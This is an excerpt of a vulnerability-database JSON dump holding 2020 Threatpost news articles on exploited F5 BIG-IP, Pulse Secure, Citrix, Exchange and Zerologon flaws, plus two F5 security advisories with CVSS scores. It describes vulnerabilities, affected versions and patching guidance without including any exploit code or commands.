flaw](<https://www.ptsecurity.com/ww-en/about/news/f5-fixes-critical-vulnerability-discovered-by-positive-technologies-in-big-ip-application-delivery-controller/>), said that in order to exploit the vulnerability, an unauthenticated attacker would only need to send a specifically crafted HTTP request to the server hosting the Traffic Management User Interface (TMUI) utility for BIG-IP configuration.\n\n\u201cBy exploiting this vulnerability, a remote attacker with access to the BIG-IP configuration utility could, without authorization, perform remote code execution (RCE),\u201d Klyuchnikov said. 
\u201cThe attacker can create or delete files, disable services, intercept information, run arbitrary system commands and Java code, completely compromise the system, and pursue further targets, such as the internal network.\u201d\n\n[Vulnerable versions of BIG-IP](<https://support.f5.com/csp/article/K52145254>) (11.6.x, 12.1.x, 13.1.x, 14.1.x, 15.0.x, 15.1.x) should be updated to the corresponding fixed versions (11.6.5.2, 12.1.5.2, 13.1.3.4, 14.1.2.6, 15.1.0.4), he said.\n\nAs more active exploits are detected in the wild, [F5 Networks](<https://twitter.com/F5Networks/status/1279022116868960257>), the [U.S. Cyber Command](<https://twitter.com/CNMF_CyberAlert/status/1279151966178902016>) and [Chris Krebs](<https://twitter.com/CISAKrebs/status/1279939623062581251>), director at the U.S. Cybersecurity and Infrastructure Security Agency (CISA), have all urged administrators to implement the offered fixes as soon as possible.\n\nAnother flaw was also fixed last week in BIG-IP that could allow an authenticated attacker to launch cross-site scripting attacks. The flaw ([CVE-2020-5903](<https://support.f5.com/csp/article/K43638305>)) allows attackers to run malicious JavaScript code as a logged-in user.\n\nF5 Networks previously [dealt with security issues](<https://threatpost.com/authentication-bypass-bug-enterprise-vpns/143781/>) in 2019 when its VPN app (as well as ones built by Cisco, Palo Alto Networks and Pulse Secure) was discovered to improperly store authentication tokens and session cookies without encryption on a user\u2019s computer.\n", "cvss3": {}, "published": "2020-07-06T19:06:20", "type": "threatpost", "title": "Admins Urged to Patch Critical F5 Flaw Under Active Attack", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2020-24400", "CVE-2020-24407", "CVE-2020-5902", "CVE-2020-5903"], "modified": "2020-07-06T19:06:20", "id": "THREATPOST:312E32AA4DC31CFD90D946BC7E36088B", "href": "https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:19:31", "description": "The U.S. government is warning that Chinese threat actors have successfully compromised several government and private sector entities in recent months, by exploiting vulnerabilities in F5 BIG-IP devices, Citrix and Pulse Secure VPNs and Microsoft Exchange servers.\n\nPatches are currently available for all these flaws \u2013 and in some cases, have been available for over a year \u2013 however, the targeted organizations had not yet updated their systems, leaving them vulnerable to compromise, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) said in a Monday advisory. 
CISA claims the attacks were launched by threat actors affiliated with the Chinese Ministry of State Security.\n\n\u201cCISA and the FBI also recommend that organizations routinely audit their configuration and patch management programs to ensure they can track and mitigate emerging threats,\u201d according to a [Monday CISA advisory](<https://us-cert.cisa.gov/sites/default/files/publications/AA20-258A-Chinese_Ministry_of_State_Security-Affiliated_Cyber_Threat_Actor_Activity_S508C.pdf>). \u201cImplementing a rigorous configuration and patch management program will hamper sophisticated cyber threat actors\u2019 operations and protect organizations\u2019 resources and information systems.\u201d\n\nNo further details on the specific hacked entities were made public. The threat actors have been spotted successfully exploiting two common vulnerabilities \u2013 allowing them to compromise federal government and commercial entities, according to CISA.\n\nThe first is a vulnerability (CVE-2020-5902) in [F5\u2019s Big-IP Traffic Management User Interface](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>), which allows cyber threat actors to execute arbitrary system commands, create or delete files, disable services, and/or execute Java code. As of July, about 8,000 users of F5 Networks\u2019 BIG-IP family of networking devices [were still vulnerable](<https://threatpost.com/patch-critical-f5-flaw-active-attack/157164/>) to the critical flaw.\n\nFeds also observed the attackers exploiting an [arbitrary file reading vulnerability](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) affecting Pulse Secure VPN appliances (CVE-2019-11510). 
This flaw \u2013 speculated to be the [cause of the Travelex breach](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) earlier this year \u2013 allows bad actors to gain access to victim networks.\n\n\u201cAlthough Pulse Secure released patches for CVE-2019-11510 in April 2019, CISA observed incidents where [compromised Active Directory credentials](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) were used months after the victim organization patched their VPN appliance,\u201d according to the advisory.\n\nThreat actors were also observed hunting for [Citrix VPN Appliances](<https://threatpost.com/unpatched-citrix-flaw-exploits/151748/>) vulnerable to CVE-2019-19781, which is a flaw that enables attackers to execute directory traversal attacks. They have also been observed attempting to exploit a [Microsoft Exchange server](<https://threatpost.com/serious-exchange-flaw-still-plagues-350k-servers/154548/>) remote code execution flaw (CVE-2020-0688) that allows attackers to collect emails of targeted networks.\n\nAs part of its advisory, CISA also identified common TTPs utilized by the threat actors. For instance, threat actors have been spotted using [the Cobalt Strike commercial penetration testing tool](<https://threatpost.com/apt29-re-emerges-after-2-years-with-widespread-espionage-campaign/139246/>) to target commercial and federal government networks; CISA has also seen the actors successfully deploying the [open-source China Chopper tool](<https://threatpost.com/china-chopper-tool-multiple-campaigns/147813/>) against organization networks and using the [open-source tool Mimikatz](<https://threatpost.com/wipro-attackers-under-radar/144276/>).\n\nThe initial access vectors for these cyberattacks vary. CISA said it has observed threat actors utilize malicious links in spearphishing emails, as well as exploit public-facing applications. 
In one case, CISA observed the threat actors scanning a federal government agency for vulnerable web servers, as well as scanning for known vulnerabilities in network appliances (CVE-2019-11510). CISA also observed threat actors scanning and performing reconnaissance of federal government internet-facing systems shortly after the disclosure of \u201csignificant CVEs.\u201d\n\nCISA said maintaining a rigorous patching cycle continues to be the best defense against these attacks.\n\n\u201cIf critical vulnerabilities remain unpatched, cyber threat actors can carry out attacks without the need to develop custom malware and exploits or use previously unknown vulnerabilities to target a network,\u201d according to the advisory.\n\nTerence Jackson, CISO at Thycotic, echoed this recommendation, saying the advisory sheds light on the fact that organizations need to keep up with patch management. In fact, he said, according to a recent [Check Point report](<https://www.checkpoint.com/downloads/resources/cyber-attack-trends-report-mid-year-2020.pdf?mkt_tok=eyJpIjoiTldNM05UWTJOelEwTnpZeCIsInQiOiJTSVY0QTBcL0d1UnpKcXM1UzZRRnRRV1RBV1djcnArM3BWK0VrUlQyb2JFVkJka05EWFhGOFpSSVJOZGszcnlpVFNVNVBwSjZDRXNxZGdkTGRKQzJJem4yYWlBQXJERUdkNDNrZEJDWGxNVUZ3WWt5K25vc2trRnNPNFZaY3JzOE8ifQ%3D%3D>), 80 percent of observed ransomware attacks in the first half of 2020 used vulnerabilities reported and registered in 2017 and earlier \u2013 and more than 20 percent of the attacks used vulnerabilities that are at least seven years old.\n\n\u201cPatch management is one of the fundamentals of security, however, it is difficult and we are still receiving a failing grade. Patch management, enforcing MFA and least privilege are key to preventing cyber-attacks in both the public and private sectors,\u201d he told Threatpost.\n", "cvss3": {}, "published": "2020-09-14T21:20:46", "type": "threatpost", "title": "Feds Warn Nation-State Hackers are Actively Exploiting Unpatched Microsoft Exchange, F5, VPN Bugs", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-0688", "CVE-2020-5135", "CVE-2020-5902"], "modified": "2020-09-14T21:20:46", "id": "THREATPOST:558A7B1DE564A8E368D33E86E291AB77", "href": "https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-13T16:45:38", "description": "U.S. 
government officials have warned that advanced persistent threat actors (APTs) are now leveraging Microsoft\u2019s severe privilege-escalation flaw, dubbed \u201cZerologon,\u201d to target elections support systems.\n\nDays after [Microsoft sounded the alarm that an Iranian nation-state actor](<https://threatpost.com/microsoft-zerologon-attack-iranian-actors/159874/>) was actively exploiting the flaw ([CVE-2020-1472](<https://www.tenable.com/cve/CVE-2020-1472>)), the Cybersecurity Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI) published a joint advisory warning of further attacks.\n\nThe advisory details how attackers are chaining together various vulnerabilities and exploits \u2013 including using VPN vulnerabilities to gain initial access and then Zerologon as a post-exploitation method \u2013 to compromise government networks.\n\n\u201cThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal and territorial (SLTT) government networks,\u201d according [to the security advisory](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>). \u201cAlthough it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\u201d\n\nWith the [U.S. 
November presidential elections](<https://threatpost.com/2020-election-secure-vote-tallies-problem/158533/>) around the corner \u2013 and cybercriminal activity subsequently ramping up to target [election infrastructure](<https://threatpost.com/black-hat-usa-2020-preview-election-security-covid-disinformation-and-more/157875/>) and [presidential campaigns](<https://threatpost.com/microsoft-cyberattacks-trump-biden-election-campaigns/159143/>) \u2013 election security is top of mind. While the CISA and FBI\u2019s advisory did not detail what type of elections systems were targeted, it did note that there is no evidence to support that the \u201cintegrity of elections data has been compromised.\u201d\n\nMicrosoft released a patch for the Zerologon vulnerability as part of its [August 11, 2020 Patch Tuesday security updates](<https://threatpost.com/microsoft-out-of-band-security-update-windows-remote-access-flaws/158511/>). Exploiting the bug allows an unauthenticated attacker, with network access to a domain controller, to completely compromise all Active Directory identity services, according to Microsoft.\n\nDespite a patch being issued, many companies have not yet applied the patches to their systems \u2013 and cybercriminals are taking advantage of that in a recent slew of government-targeted attacks.\n\nThe CISA and FBI warned that various APT actors are commonly using [a Fortinet vulnerability](<https://threatpost.com/apt-groups-exploiting-flaws-in-unpatched-vpns-officials-warn/148956/>) to gain initial access to companies. That flaw (CVE-2018-13379) is a path-traversal glitch in Fortinet\u2019s FortiOS Secure Socket Layer (SSL) virtual private network (VPN) solution. 
While the flaw was patched in April 2019, exploitation details were publicized in August 2019, opening the door for attackers to exploit the error.\n\nOther initial vulnerabilities being targeted in the attacks include ones in Citrix NetScaler ([CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)), MobileIron ([CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)), Pulse Secure ([CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)), Palo Alto Networks ([CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)) and F5 BIG-IP ([CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)).\n\nAfter exploiting an initial flaw, attackers are then leveraging the Zerologon flaw to escalate privileges, researchers said. They then use legitimate credentials to log in via VPN or remote-access services, in order to maintain persistence.\n\n\u201cThe actors are leveraging CVE-2020-1472 in Windows Netlogon to escalate privileges and obtain access to Windows AD servers,\u201d they said. \u201cActors are also leveraging the opensource tools such as Mimikatz and the CrackMapExec tool to obtain valid account credentials from AD servers.\u201d\n\nThe advisory comes as exploitation attempts against Zerologon spike, with Microsoft recently warning of exploits by an [advanced persistent threat](<https://threatpost.com/iranian-apt-targets-govs-with-new-malware/153162/>) (APT) actor, which the company calls MERCURY (also known as MuddyWater, Static Kitten and Seedworm). 
[Cisco Talos researchers also recently warned of](<https://threatpost.com/zerologon-attacks-microsoft-dcs-snowball/159656/>) a spike in exploitation attempts against Zerologon.\n\n[Earlier in September, the stakes got higher](<https://threatpost.com/windows-exploit-microsoft-zerologon-flaw/159254/>) for risks tied to the bug when four public proof-of-concept exploits for the flaw were released on [GitHub](<https://github.com/dirkjanm/CVE-2020-1472>). This spurred the Secretary of Homeland Security [to issue a rare emergency directive](<https://threatpost.com/dire-patch-warning-zerologon/159404/>), ordering federal agencies to patch their Windows Servers against the flaw by Sept. 21.\n\nCISA and the FBI stressed that organizations should ensure their systems are patched, and adopt an \u201cassume breach\u201d mentality. Satnam Narang, staff research engineer with Tenable, agreed, saying that \u201cit seems clear that Zerologon is becoming one of the most critical vulnerabilities of 2020.\u201d\n\n\u201cPatches are available for all of the vulnerabilities referenced in the joint cybersecurity advisory from CISA and the FBI,\u201d said Narang [in a Monday analysis](<https://www.tenable.com/blog/cve-2020-1472-advanced-persistent-threat-actors-use-zerologon-vulnerability-in-exploit-chain>). \u201cMost of the vulnerabilities had patches available for them following their disclosure, with the exception of CVE-2019-19781, which received patches a month after it was originally disclosed.\u201d\n", "cvss3": {}, "published": "2020-10-13T16:39:01", "type": "threatpost", "title": "Election Systems Under Attack via Microsoft Zerologon Exploits", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-13T16:39:01", "id": "THREATPOST:71C45E867DCD99278A38088B59938B48", "href": "https://threatpost.com/election-systems-attack-microsoft-zerologon/160021/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-22T15:51:14", "description": "Chinese state-sponsored cyberattackers are actively compromising U.S. 
targets using a raft of known security vulnerabilities \u2013 with a Pulse VPN flaw claiming the dubious title of \u201cmost-favored bug\u201d for these groups.\n\nThat\u2019s according to the National Security Agency (NSA), which released a \u201ctop 25\u201d list of the exploits that are used the most by China-linked advanced persistent threats (APTs), which include the likes of [Cactus Pete](<https://threatpost.com/cactuspete-apt-toolset-respionage-targets/158350/>), [TA413](<https://threatpost.com/chinese-apt-sepulcher-malware-phishing-attacks/158871/>), [Vicious Panda](<https://threatpost.com/coronavirus-apt-attack-malware/153697/>) and [Winnti](<https://threatpost.com/black-hat-linux-spyware-stack-chinese-apts/158092/>).\n\nThe Feds [warned in September](<https://threatpost.com/hackers-gov-microsoft-exchange-f5-exploits/159226/>) that Chinese threat actors had successfully compromised several government and private sector entities in recent months; the NSA is now driving the point home about the need to patch amid this flurry of heightened activity.\n\n\u201cMany of these vulnerabilities can be used to gain initial access to victim networks by exploiting products that are directly accessible from the internet,\u201d warned the NSA, in its Tuesday [advisory](<https://www.nsa.gov/News-Features/News-Stories/Article-View/Article/2387347/nsa-warns-chinese-state-sponsored-malicious-cyber-actors-exploiting-25-cves/>). \u201cOnce a cyber-actor has established a presence on a network from one of these remote exploitation vulnerabilities, they can use other vulnerabilities to further exploit the network from the inside.\u201d\n\nAPTs \u2013 Chinese and otherwise \u2013 have ramped up their cyberespionage efforts in the wake of the pandemic as well as in the leadup to the U.S. elections next month. 
But Chlo\u00e9 Messdaghi, vice president of strategy at Point3 Security, noted that these vulnerabilities contribute to an ongoing swell of attacks.\n\n\u201cWe definitely saw an increase in this situation last year and it\u2019s ongoing,\u201d she said. \u201cThey\u2019re trying to collect intellectual property data. Chinese attackers could be nation-state, could be a company or group of companies, or just a group of threat actors or an individual trying to get proprietary information to utilize and build competitive companies\u2026in other words, to steal and use for their own gain.\u201d\n\n## **Pulse Secure, BlueKeep, Zerologon and More**\n\nPlenty of well-known and infamous bugs made the NSA\u2019s Top 25 cut. For instance, a notorious Pulse Secure VPN bug (CVE-2019-11510) is the first flaw on the list.\n\nIt\u2019s an [arbitrary file-reading flaw](<https://www.tenable.com/blog/cve-2019-11510-critical-pulse-connect-secure-vulnerability-used-in-sodinokibi-ransomware>) that opens systems to exploitation from remote, unauthenticated attackers. In April of this year, the Department of Homeland Security\u2019s Cybersecurity and Infrastructure Security Agency (CISA) [warned that](<https://threatpost.com/dhs-urges-pulse-secure-vpn-users-to-update-passwords/154925/>) attackers are actively using the issue to steal passwords to infiltrate corporate networks. And in fact, this is the bug at the heart of the [Travelex ransomware fiasco](<https://threatpost.com/sodinokibi-ransomware-travelex-fiasco/151600/>) that hit in January.\n\nPulse Secure issued a patch in April 2019, but many companies impacted by the flaw still haven\u2019t applied it, CISA warned.\n\nAnother biggie for foreign adversaries is a critical flaw in F5 BIG-IP proxy/load balancer devices ([CVE-2020-5902](<https://threatpost.com/thousands-f5-big-ip-users-takeover/157543/>)). 
This remote code-execution (RCE) bug exists in the Traffic Management User Interface (TMUI) of the device that\u2019s used for configuration. It allows complete control of the host machine upon exploitation, enabling interception and redirection of web traffic, decryption of traffic destined for web servers, and serving as a hop-point into other areas of the network.\n\nAt the end of June, F5 issued urgent patches for the bug, which has a CVSS severity score of 10 out of 10 \u201cdue to its lack of complexity, ease of attack vector, and high impacts to confidentiality, integrity and availability,\u201d researchers said at the time. Thousands of devices were shown to be vulnerable in a Shodan search in July.\n\nThe NSA also flagged several vulnerabilities in Citrix as being Chinese faves, including CVE-2019-19781, which was revealed last holiday season. The bug exists in the Citrix Application Delivery Controller (ADC) and Gateway, a purpose-built networking appliance meant to improve the performance and security of applications delivered over the web. An exploit can lead to RCE without credentials.\n\nWhen it was originally disclosed in December, the vulnerability did not have a patch, and Citrix had to [scramble to push fixes out](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \u2013 but not before public proof-of-concept (PoC) exploit code emerged, along with active exploitations and mass scanning activity for the vulnerable Citrix products.\n\nOther Citrix bugs in the list include CVE-2020-8193, CVE-2020-8195 and CVE-2020-8196.\n\nMeanwhile, Microsoft bugs are well-represented, including the [BlueKeep RCE bug](<https://threatpost.com/one-million-devices-open-to-wormable-microsoft-bluekeep-flaw/145113/>) in Remote Desktop Services (RDP), which is still under active attack a year after disclosure. 
The bug tracked as CVE-2019-0708 can be exploited by an unauthenticated attacker connecting to the target system using RDP, to send specially crafted requests and execute code. The issue with BlueKeep is that researchers believe it to be wormable, which could lead to a WannaCry-level disaster, they have said.\n\nAnother bug-with-a-name on the list is [Zerologon](<https://threatpost.com/ryuk-ransomware-gang-zerologon-lightning-attack/160286/>), the privilege-escalation vulnerability that allows an unauthenticated attacker with network access to a domain controller to completely compromise all Active Directory identity services. It was patched in August, but many organizations remain vulnerable, and the DHS recently [issued a dire warning](<https://threatpost.com/dire-patch-warning-zerologon/159404/>) on the bug amid a tsunami of attacks.\n\nThe very first bug ever reported to Microsoft by the NSA, CVE-2020-0601, is also being favored by Chinese actors. This spoofing vulnerability, [patched in January,](<https://threatpost.com/microsoft-patches-crypto-bug/151842/>) exists in the way Windows CryptoAPI (Crypt32.dll) validates Elliptic Curve Cryptography (ECC) certificates. 
An attacker could exploit the vulnerability by using a spoofed code-signing certificate to sign a malicious executable, making it appear that the file was from a trusted, legitimate source.\n\nTwo proof-of-concept (PoC) exploits were publicly released just a week after Microsoft\u2019s January Patch Tuesday security bulletin addressed the flaw.\n\nThen there\u2019s a high-profile Microsoft Exchange validation key RCE bug ([CVE-2020-0688](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0688>)), which stems from the server failing to properly create unique keys at install time.\n\nIt was fixed as part of Microsoft\u2019s [February Patch Tuesday](<https://threatpost.com/microsoft-active-attacks-air-gap-99-patches/152807/>) updates \u2013 and [admins in March were warned](<https://threatpost.com/microsoft-exchange-server-flaw-exploited-in-apt-attacks/153527/>) that unpatched servers are being exploited in the wild by unnamed APT actors. But as of Sept. 30, at least 61 percent of Exchange 2010, 2013, 2016 and 2019 servers [were still vulnerable](<https://threatpost.com/microsoft-exchange-exploited-flaw/159669/>) to the flaw.\n\n## **The Best of the Rest**\n\nThe NSA\u2019s Top 25 list covers plenty of ground, including a [nearly ubiquitous RCE bug](<https://threatpost.com/critical-microsoft-rce-bugs-windows/145572/>) (CVE-2019-1040) that, when disclosed last year, affected all versions of Windows. 
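The CVE-2020-0688 passage attributes the Exchange bug to the server "failing to properly create unique keys at install time". The following added example (not Exchange's or Microsoft's code) shows the consequence in isolation: a server that authenticates serialized client-supplied state with an HMAC key fixed at build time accepts state forged by anyone who owns a copy of the software, while a key generated at install time does not. `StateProtector`, `install_with_static_key`, `install_with_unique_key`, the `BUILD_TIME_KEY` value and the payload dict are all constructed for this demo; the real Exchange key is deliberately not reproduced, and deserializing the forged state (the step that turned key reuse into RCE) is out of scope here.

```python
# Added example (not Exchange's or Microsoft's code): why a secret that must be
# unique per installation cannot be generated at build time. Keys and payloads
# below are constructed for the demo.
import base64
import hashlib
import hmac
import json
import os

# Stand-in for a key baked into the installer and therefore identical on every
# server; a constructed value, not the real Exchange key.
BUILD_TIME_KEY = hashlib.sha1(b"constructed: installer default secret").digest()

class StateProtector:
    """Signs a serialized state blob (ViewState-style) so the server can later
    trust what a client hands back. Integrity rests entirely on the signing
    key being unknown to clients."""
    def __init__(self, key: bytes):
        self.key = key

    def protect(self, state: dict) -> str:
        body = json.dumps(state, sort_keys=True).encode()
        mac = hmac.new(self.key, body, hashlib.sha1).digest()
        return base64.b64encode(body + mac).decode()

    def unprotect(self, token: str):
        """Returns the state dict, or None when the MAC does not verify."""
        raw = base64.b64decode(token)
        body, mac = raw[:-20], raw[-20:]
        expected = hmac.new(self.key, body, hashlib.sha1).digest()
        if not hmac.compare_digest(mac, expected):
            return None
        return json.loads(body)

def install_with_static_key() -> StateProtector:
    # Pre-fix behaviour: every install shares BUILD_TIME_KEY.
    return StateProtector(BUILD_TIME_KEY)

def install_with_unique_key() -> StateProtector:
    # The fix: derive the key at install time from the OS CSPRNG.
    return StateProtector(os.urandom(32))

def demo():
    victim_static = install_with_static_key()
    victim_unique = install_with_unique_key()
    # The attacker reads the static key out of their own copy of the product
    # and signs state the victim was never meant to accept.
    attacker = StateProtector(BUILD_TIME_KEY)
    forged = attacker.protect({"constructed": "attacker-chosen object graph"})
    tampered = base64.b64encode(b'{"x": 1}' + b"\x00" * 20).decode()
    return {
        "static_key_install_accepts_forgery": victim_static.unprotect(forged) is not None,
        "unique_key_install_rejects_forgery": victim_unique.unprotect(forged) is None,
        "tampered_body_rejected": victim_static.unprotect(tampered) is None,
    }
```

The MAC itself is sound in both installs (the tampered blob is rejected either way); what differs is only whether the attacker can obtain the key, which is why the fix for a bug of this shape is key generation at setup rather than any change to the verification code.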
It allows a man-in-the-middle attacker to bypass the NTLM Message Integrity Check protection.\n\nHere\u2019s a list of the other flaws:\n\n * CVE-2018-4939 in certain Adobe ColdFusion versions.\n * CVE-2020-2555 in the Oracle Coherence product in Oracle Fusion Middleware.\n * CVE-2019-3396 in the Widget Connector macro in Atlassian Confluence Server\n * CVE-2019-11580 in Atlassian Crowd or Crowd Data Center\n * CVE-2020-10189 in Zoho ManageEngine Desktop Central\n * CVE-2019-18935 in Progress Telerik UI for ASP.NET AJAX.\n * CVE-2019-0803 in Windows, a privilege-escalation issue in the Win32k component\n * CVE-2020-3118 in the Cisco Discovery Protocol implementation for Cisco IOS XR Software\n * CVE-2020-8515 in DrayTek Vigor devices\n\nThe advisory also covers three older bugs: One in Exim mail transfer (CVE-2018-6789); one in Symantec Messaging Gateway (CVE-2017-6327); and one in the WLS Security component in Oracle WebLogic Server (CVE-2015-4852).\n\n\u201cWe hear loud and clear that it can be hard to prioritize patching and mitigation efforts,\u201d NSA Cybersecurity Director Anne Neuberger said in a media statement. 
\u201cWe hope that by highlighting the vulnerabilities that China is actively using to compromise systems, cybersecurity professionals will gain actionable information to prioritize efforts and secure their systems.\u201d\n", "cvss3": {}, "published": "2020-10-21T20:31:17", "type": "threatpost", "title": "Bug Parade: NSA Warns on Cresting China-Backed Cyberattacks", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2015-4852", "CVE-2017-6327", "CVE-2018-4939", "CVE-2018-6789", "CVE-2019-0708", "CVE-2019-0803", "CVE-2019-1040", "CVE-2019-11510", "CVE-2019-11580", "CVE-2019-18935", "CVE-2019-19781", "CVE-2019-3396", "CVE-2020-0601", "CVE-2020-0688", "CVE-2020-10189", "CVE-2020-2555", "CVE-2020-3118", "CVE-2020-5902", "CVE-2020-8193", "CVE-2020-8195", "CVE-2020-8196", "CVE-2020-8515"], "modified": "2020-10-21T20:31:17", "id": "THREATPOST:F8F0749C57FDD3CABE842BDFEAD33452", "href": "https://threatpost.com/bug-nsa-china-backed-cyberattacks/160421/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "f5": [{"lastseen": "2022-02-01T00:00:00", "description": "When running in Appliance mode with Advanced WAF or ASM provisioned, the Traffic Management User Interface (TMUI), also referred to as the Configuration utility, has an authenticated remote command execution vulnerability in undisclosed pages. ([CVE-2021-22989](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22989>))\n\n**Note**: For systems not running in Appliance mode, refer to [K45056101 Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22990](<https://support.f5.com/csp/article/K45056101>).\n\nImpact\n\nThis vulnerability allows highly privileged authenticated users with the roles Administrator, Resource Administrator, or Application Security Administrator with network access to the Configuration utility, through the BIG-IP management port or self IP addresses, to execute arbitrary system commands, create or delete files, or disable services. 
This vulnerability can only be exploited through the control plane and cannot be exploited through the data plane. Exploitation can lead to complete system compromise and breakout of Appliance mode. Appliance mode is enforced by a specific license or may be enabled or disabled for individual vCMP guest instances. For information on Appliance mode, refer to [K12815: Overview of Appliance mode](<https://support.f5.com/csp/article/K12815>).\n\n**Note**: If you believe your system may have been compromised, refer to [K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system](<https://support.f5.com/csp/article/K11438344>).\n", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-03-10T14:49:00", "type": "f5", "title": "Appliance mode Advanced WAF/ASM TMUI authenticated remote command execution vulnerability CVE-2021-22989", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-22987", "CVE-2021-22988", "CVE-2021-22989", "CVE-2021-22990", "CVE-2021-23007"], "modified": "2021-07-08T06:25:00", "id": "F5:K56142644", "href": 
"https://support.f5.com/csp/article/K56142644", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-01T00:00:00", "description": "When running in Appliance Mode, an authenticated user assigned the 'Administrator' role may be able to bypass Appliance Mode restrictions utilizing undisclosed iControl REST endpoints. ([CVE-2021-23015](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-23015>))\n\n**Note**: This vulnerability is unrelated to the vulnerability described in the following article: [K03009991: iControl REST unauthenticated remote command execution vulnerability CVE-2021-22986](<https://support.f5.com/csp/article/K03009991>).\n\nImpact\n\nIn Appliance Mode, an authenticated user with valid user credentials assigned the Administrator role may be able to bypass appliance mode restrictions and run arbitrary commands. This is a control plane issue; there is no data plane exposure. Appliance Mode is enforced by a specific license or may be enabled or disabled for individual Virtual Clustered Multiprocessing (vCMP) guest instances. For information on Appliance mode, refer to: [K12815: Overview of Appliance mode](<https://support.f5.com/csp/article/K12815>). 
\n\n**Note**: If you believe your system may have been compromised, refer to [K11438344: Considerations and guidance when you suspect a security compromise on a BIG-IP system](<https://support.f5.com/csp/article/K11438344>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-28T15:27:00", "type": "f5", "title": "Appliance Mode authenticated iControl REST vulnerability CVE-2021-23015", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22986", "CVE-2021-23015"], "modified": "2021-07-22T02:46:00", "id": "F5:K74151369", "href": "https://support.f5.com/csp/article/K74151369", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-21T12:47:54", "description": "## Vuln Impact\r\n\r\nThis vulnerability allows for unauthenticated ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": 
